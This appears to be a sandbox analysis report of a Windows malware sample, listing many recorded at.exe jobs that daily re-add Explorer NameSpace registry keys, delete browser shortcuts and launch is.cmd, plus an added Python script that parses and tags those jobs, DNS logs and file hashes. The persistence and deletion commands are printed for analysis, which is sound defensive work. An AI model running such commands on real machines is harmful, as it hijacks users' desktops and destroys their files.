at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
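The at.exe lines above record the same three actions scheduled at many clock times every day of the week: REG ADD against an Explorer Desktop\NameSpace CLSID, deletion of files matching a pattern in two user folders, and launching C:\WINDOWS\mail\UltraEdlt\is.cmd. The quoted folder and pattern names appear as box-drawing glyphs because the sandbox rendered double-byte GBK text through code page 437; re-encoding the glyphs as CP437 bytes and decoding them as GBK gives "桌面" (Desktop) for the folder and "浏览" (the first two characters of "browser") for the deleted-file pattern. The script below is an added triage helper, not part of the sandbox report: it parses at.exe job lines, repairs that mojibake, and tags each job. The three sample lines are copied from the report; the tag names and the GBK assumption are the author's.

```python
"""Parse and classify at.exe job lines from a sandbox process list.

Added example (not from the report). Assumes the garbled path segments
are GBK bytes shown through CP437, which fits an English-locale sandbox
detonating a Chinese-language sample.
"""
import re
from dataclasses import dataclass

# Constructed sample: three representative lines copied from the report.
SAMPLE_JOBS = [
    r'at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday '
    r'cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion'
    r'\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"',
    r'at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday '
    r'cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"',
    r'at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday '
    r'C:\WINDOWS\mail\UltraEdlt\is.cmd',
]

AT_LINE = re.compile(
    r'^at\s+(?P<time>\d{1,2}:\d{2})\s+/every:(?P<days>\S+)\s+(?P<cmd>.+)$'
)
ALL_DAYS = {'Monday', 'Tuesday', 'Wednesday', 'Thursday',
            'Friday', 'Saturday', 'Sunday'}


def fix_mojibake(text: str) -> str:
    """Repair CP437-rendered GBK runs; leave ASCII and undecodable runs alone."""
    def repair(match: re.Match) -> str:
        run = match.group(0).replace('\u03bc', '\u00b5')  # Greek mu -> micro sign
        try:
            return run.encode('cp437').decode('gbk')
        except (UnicodeEncodeError, UnicodeDecodeError):
            return match.group(0)  # odd-length or non-CP437 run: keep as recorded
    return re.sub(r'[^\x00-\x7f]+', repair, text)


def classify(command: str) -> str:
    """Tag the scheduled payload. Tag names are the author's, not the sandbox's."""
    c = command.lower()
    if 'reg add' in c and 'explorer\\desktop\\namespace\\' in c:
        return 'namespace-clsid-reinstall'
    if c.startswith('cmd.exe /c del '):
        return 'shortcut-deletion'
    if c.endswith(('.cmd', '.bat', '.vbs')):
        return 'script-launch'
    return 'other'


@dataclass(frozen=True)
class AtJob:
    time: str
    days: frozenset
    command: str   # exactly as the sandbox recorded it
    decoded: str   # command with mojibake repaired
    tactic: str


def parse_at_line(line: str) -> AtJob:
    m = AT_LINE.match(line.strip())
    if not m:
        raise ValueError(f'not an at.exe job line: {line!r}')
    cmd = m.group('cmd')
    return AtJob(time=m.group('time'),
                 days=frozenset(m.group('days').split(',')),
                 command=cmd,
                 decoded=fix_mojibake(cmd),
                 tactic=classify(cmd))


def triage(lines) -> list:
    """Parse every job line; a daily job that deletes files or rewrites a
    Desktop NameSpace key is what the report's persistence looks like."""
    return [parse_at_line(line) for line in lines]


def runs_every_day(job: AtJob) -> bool:
    return job.days == ALL_DAYS


if __name__ == '__main__':
    for job in triage(SAMPLE_JOBS):
        daily = 'daily' if runs_every_day(job) else 'partial-week'
        print(f'{job.time:>5} {daily:<12} {job.tactic:<26} {job.decoded}')
```

Run it with the full at.exe block pasted into SAMPLE_JOBS to get one tagged row per job; the repaired paths read `C:\Users\Admin\桌面\*浏览*.*`, that is, every file on the user's Desktop (and in Quick Launch) whose name contains "浏览", which is how browser shortcuts are named on a Chinese-locale system. Note that at.exe submits jobs over the Task Scheduler's `\PIPE\atsvc` RPC endpoint, which is why that pipe appears in the Files list below.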
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\121xia.vbs
| MD5 | 7e46083fb1779c4baf8efe26e6bfbed4 |
| SHA1 | 07155bb6e06e4ddb125a7afd50b5ee67c5c2e1a2 |
| SHA256 | d2b0505bb8eafd88c99de4643d40c9aa5a5a0428a0a30d291fa29657974fadb9 |
| SHA512 | c594c621e954a3b76d9d77a25f4dbd563bacf31450e5afd1ba577f147a4ea6e591c4ba361c0c3c89623a06d6facfb4dd9e1633efff8a41871f21734251a2ffc0 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\to.cmd
| MD5 | 93283cb2cbb91dc2553d3ccc53c24787 |
| SHA1 | 271054a80b7332910d4f746ccbabd6b9d85915fe |
| SHA256 | 31d5b5b80fc2c292ae1d3d94e6c35b5272e8ad0e9b06aa086eb61d6238d66beb |
| SHA512 | 6b485717301db3a10fde12b378de7e79a018e5e33eef9808c1a414a2b5ba983cc4b32a1bbfa5cd4005085c648381f663eb15c35f1e06c5b3e58bbc6fc6e5b70f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs
| MD5 | e9453c56277dd24802b553677d0620fc |
| SHA1 | 8b27914191feae8061dd9577d473a638173b92a7 |
| SHA256 | 46493b2ba1dbf1f0b360d276423c0e7b7f99cdbe7f23a623d63ce8f20f82ea2d |
| SHA512 | c55a87c18ab67756556943c480385d6a42bb0904b090885b93c151f4661a132c9eb67a9838876af6217636a313a3a817629c2a0fe2a43313fddf1978191d8e41 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd
| MD5 | 5e1ac5999e539cafa3a303e8386cfbf9 |
| SHA1 | dcd5ce7b101636bb35b3c38ea4456f20b5fb142a |
| SHA256 | d9a95138ba749e2c04355d7b9354d90a45941d20fb120af3d2969779d90748d6 |
| SHA512 | f18fe45f0731f4deec3fde3ff19fe1b3d586db3e75e748224adfa0b0ea4b1fabab6b7dfbed3a127cadf2ea9ee6a5a0f9191b50055df39e64a5cce90da50a43a1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd
| MD5 | 22ba26c787caf9c226a57ab934efe3a7 |
| SHA1 | 41da9b24a7e138eadf7fe359a9832bab35a22098 |
| SHA256 | 506c7c101ef39fb59bcef1a4952f0303f979daf01ffe4048e12458ad3cc0181d |
| SHA512 | 75609142b2e50fee2136f27c0dd124b3714f052579ab667fbfaf6f167bd1057b967f34d05293bf4b316b8580a3f63a8903fa147c83821087a4102a66ffb4e941 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd
| MD5 | 1d903a49275ecf0360a005a210710ae1 |
| SHA1 | 53d92ee4cf725fd774fde7d8715dc57f05b4ad5e |
| SHA256 | 5228e97bfb7487be8921377a47ee94aa14ab9fb5208d719fc92cf81350949c6e |
| SHA512 | 0411ec8b3cf03f3587fb9a47b7e587d879fcdfbc6a56e2637a6e5400f4a4fd49c52adc0012c66bde052ed5b5bf96b53340b361cd99c8c2b3a4087d7147362ff4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.cmd
| MD5 | b47fb6ca5604063bb4e0af862ee3be9c |
| SHA1 | ebe74903212c246c83d826fa9ce7789141772b30 |
| SHA256 | fd34806658512394d2f4b9185d32590717b7f2169caad83bea0d93b3564b3044 |
| SHA512 | 0a01779afed506d2e22267205863d23f8570de394704019d23cb1d8239fa1735d04976bc3cdcab301db33297cd6a2203afbc4238c1158edb044ba4a65a2db814 |
\??\PIPE\atsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1424-53-0x0000000000400000-0x0000000000423000-memory.dmp
memory/1424-55-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verFCFD.tmp
| MD5 | 1a545d0052b581fbb2ab4c52133846bc |
| SHA1 | 62f3266a9b9925cd6d98658b92adec673cbe3dd3 |
| SHA256 | 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1 |
| SHA512 | bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YY018DS9\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |